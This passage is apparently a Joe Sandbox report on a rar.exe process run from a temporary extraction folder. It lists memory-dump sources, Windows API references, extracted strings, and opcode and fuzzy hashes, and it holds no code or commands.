• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CurrentPriorityThread$ClassProcess
• String ID:
• API String ID: 1171435874-0
• Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
• Instruction ID: 7da631ef9c0eda57cd25a24bc4d276525446e47972a11f7d0172352d10deb42c
• Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
• Instruction Fuzzy Hash: E8110976E186428AE6748F15A48827C72E1FF84F48F6050F5CB0ADB695DF2DB88B8705
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ErrorLast$abort
• String ID:
• API String ID: 1447195878-0
• Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
• Instruction ID: c2e00364cbf1269bcef079302adeb314a1347c564133c569eac0ef1141178af5
• Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
• Instruction Fuzzy Hash: B2011024B0964247FE78AB31A65623871D1CF88F80F1405F8E91E87BD6EE2CF8418741
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
• Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction ID: defbfff4334c5e4c968b05ea87e18f75bcda18de360283a74e6f4b1aae6cacf6
• Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
• Instruction Fuzzy Hash: F391F462B097CA46EF258F2591803A87BE5EB65FD0F0481B1CB9D877D5DE2CE915C302
APIs
  • Part of subcall function 00007FF69A42B6D0: Sleep.KERNEL32(?,?,?,?,00007FF69A3FCBED,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A42B730
• new.LIBCMT ref: 00007FF69A41CFD9
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID: rar$rev
                                                                                                                                                                                                                                      • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                      • Opcode ID: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                      • Instruction ID: 273ebe96543b26183070cff0f3cb2039700ed795ac4287f0dffc9339640f2a23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00A1BCA2A0869286EB30DB20C9542BD73E5FF65F88F5540F1DA5D876D6EF2CE550C340
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *
• API String ID: 3215553584-163128923
• Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction ID: 40399556b451f82d3c5b9c59db70c47042dbe914399942284e0609630c7a8df5
• Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
• Instruction Fuzzy Hash: 5E717F7291861286E7788F298A4103D3BE0FF55F48F2411F6DA8BCA398DF79E881D751
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: e+000$gfff
• API String ID: 3215553584-3030954782
• Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
• Instruction ID: 1bf658c63cf1d67e94cbd417a96369247f26fc211349306fa000269652b67ecf
• Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
• Instruction Fuzzy Hash: 5C51F3A2B187C246EB758F3599413697AD1EB41F90F08D2F1C6ACCBBD6DE2CD8448701
APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF69A40475B,?,00000000,?,?,00007FF69A404620,?,00000000,?), ref: 00007FF69A414633
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 1611563598-253988292
• Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction ID: 8391c5fe64298be948dd1a5676af78d92d5e5b79ad76dde327ac0425399df735
• Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
• Instruction Fuzzy Hash: 6741C491A0868240E930AB52E5111B933D1EF66FD8F8185F1DEADC76D6EE3CE555C340
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe
• API String ID: 3307058713-1550257945
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: AttributesFilewcsstr
• String ID: System Volume Information\
• API String ID: 1592324571-4227249723
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: LoadString$fflushswprintf
• String ID: %d.%02d$[
• API String ID: 1946543793-195111373
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: snprintf
• String ID: $%s$@%s
• API String ID: 4288800496-834177443
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: fixed%u.$fixed.
• API String ID: 233258989-2525383582
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: LoadString
• String ID: Adding %-58s
• API String ID: 2948472770-2059140559
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: ;%%0%du
• API String ID: 233258989-2249936285
APIs
  • Part of subcall function 00007FF69A4142CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A41430F
• GetVolumeInformationW.KERNEL32(?,00007FF69A400BED,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A40337E
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: InformationVolumeswprintf
• String ID: FAT$FAT32
• API String ID: 989755765-1174603449
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ErrorExceptionLastObjectSingleThrowWait
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 564652978-2248577382